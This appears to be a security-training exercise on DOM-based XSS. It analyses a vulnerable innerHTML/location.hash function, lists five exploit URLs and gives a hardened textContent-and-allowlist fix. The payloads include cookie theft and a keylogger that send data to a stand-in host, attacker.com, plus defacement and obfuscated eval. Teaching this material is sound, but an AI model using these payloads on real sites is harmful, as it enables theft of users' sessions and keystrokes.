
PBQ 8: Advanced Web Application Security - DOM-Based XSS

Client-Side XSS Exploitation

Scenario
You are testing a modern single-page application (SPA) built with JavaScript. Traditional reflected XSS detection tools are not flagging vulnerabilities, but you suspect DOM-based XSS exists.

Application Details:
- URL: https://example.com/profile
- Framework: Custom JavaScript (no framework)
- Functionality: User profile page that displays user data from URL fragments

Code Snippet Found:
```javascript
function loadUserProfile() {
    // Source: the URL fragment is attacker-controlled and never sent to the server
    let userInput = window.location.hash.substring(1);
    let profileDiv = document.getElementById('profile');
    // Sink: innerHTML parses the (decoded) fragment as HTML
    profileDiv.innerHTML = "Welcome, " + decodeURIComponent(userInput);
}
// Only bound to hashchange; nothing renders the fragment on initial page load
window.addEventListener('hashchange', loadUserProfile);
```

Your Task:
1. Analyze the code for DOM-based vulnerabilities
2. Craft exploitation payloads
3. Demonstrate impact
4. Recommend secure coding fixes

Solution

Source/sink analysis: the untrusted source is window.location.hash. The fragment is never sent to the server, which is why server-side scanners and reflected-XSS checks do not flag it. The sink is profileDiv.innerHTML, which parses the string as HTML. Because the code calls decodeURIComponent() before the assignment, a browser that percent-encodes < and > in the fragment does not protect the page; the payload is decoded right before it reaches the sink. Two practical caveats when demonstrating: (1) the handler is bound only to hashchange, so a victim who opens the link in a fresh tab will not trigger it unless the application also calls loadUserProfile() on load; otherwise the attacker has to change the fragment of an already-loaded page, for example by navigating a window or iframe they control to the same URL with a new fragment. (2) Markup inserted through innerHTML does not execute <script> elements (the HTML parser marks them as non-executable), so payloads must carry their code in an event-handler attribute such as <img onerror>.

Exploit 1: DOM-Based XSS via innerHTML with URL fragment
Exploit URL: https://example.com/profile#<img src=x onerror=alert(document.cookie)>

Exploit 2: Cookie theft via DOM XSS (only cookies without the HttpOnly flag are readable from document.cookie)
Exploit URL: https://example.com/profile#<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

Exploit 3: Keylogger injection via DOM XSS
Exploit URL: https://example.com/profile#<img src=x onerror="document.onkeypress=function(e){fetch('https://attacker.com/log?k='+e.key)}">

Exploit 4: Defacement via DOM XSS
Exploit URL: https://example.com/profile#<img src=x onerror="document.body.innerHTML='<h1>Hacked!</h1>'">

Exploit 5: Filter evasion using String.fromCharCode (the payload contains no literal alert(...); note that because the fragment never leaves the browser, this only evades client-side or proxy keyword checks, not a server-side WAF)
Exploit URL: https://example.com/profile#<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
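
Secure coding fix (task 4): the hardened loadUserProfile below is an added example written for this page, not code from the original application. It treats the fragment as data by assigning it to textContent instead of innerHTML, validates it against an allowlist before use, rejects malformed percent-encoding, and also runs on initial page load. The username pattern, the "guest" fallback, and the parseProfileFragment/renderWelcome helper names are assumptions chosen for the example.

```javascript
// Added example: hardened replacement for loadUserProfile (not from the original page).
// Assumption: a profile name is 1-32 characters from [A-Za-z0-9_.-].
const USERNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;

// Pure function so the validation can be unit-tested without a DOM.
// Takes the raw window.location.hash value (e.g. "#alice" or "#%3Cimg%20src%3Dx%3E").
function parseProfileFragment(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  let decoded;
  try {
    decoded = decodeURIComponent(raw);
  } catch (e) {
    return null; // malformed percent-encoding (decodeURIComponent throws URIError)
  }
  // Allowlist validation: anything containing <, >, quotes, spaces, etc. is rejected.
  return USERNAME_RE.test(decoded) ? decoded : null;
}

// Renders into any object with a textContent property (a real element in the browser,
// a plain object in tests). textContent never parses markup, so even if validation
// were loosened later, a payload would appear as literal text, not as HTML.
function renderWelcome(profileEl, hash) {
  const name = parseProfileFragment(hash);
  profileEl.textContent = name === null ? 'Welcome, guest' : `Welcome, ${name}`;
  return profileEl.textContent;
}

function loadUserProfileSafe() {
  renderWelcome(document.getElementById('profile'), window.location.hash);
}

// Browser-only wiring; guarded so the module also loads in Node for testing.
if (typeof window !== 'undefined') {
  window.addEventListener('hashchange', loadUserProfileSafe);
  window.addEventListener('DOMContentLoaded', loadUserProfileSafe);
}
```

Two fixes are applied on purpose rather than one: the allowlist removes the dangerous characters, and the textContent sink means the page stays safe even if the validation is relaxed or bypassed later. If the profile page genuinely needs rich markup from a client-side source, build it with createElement()/textContent or pass it through a sanitizer such as DOMPurify; never concatenate untrusted strings into innerHTML.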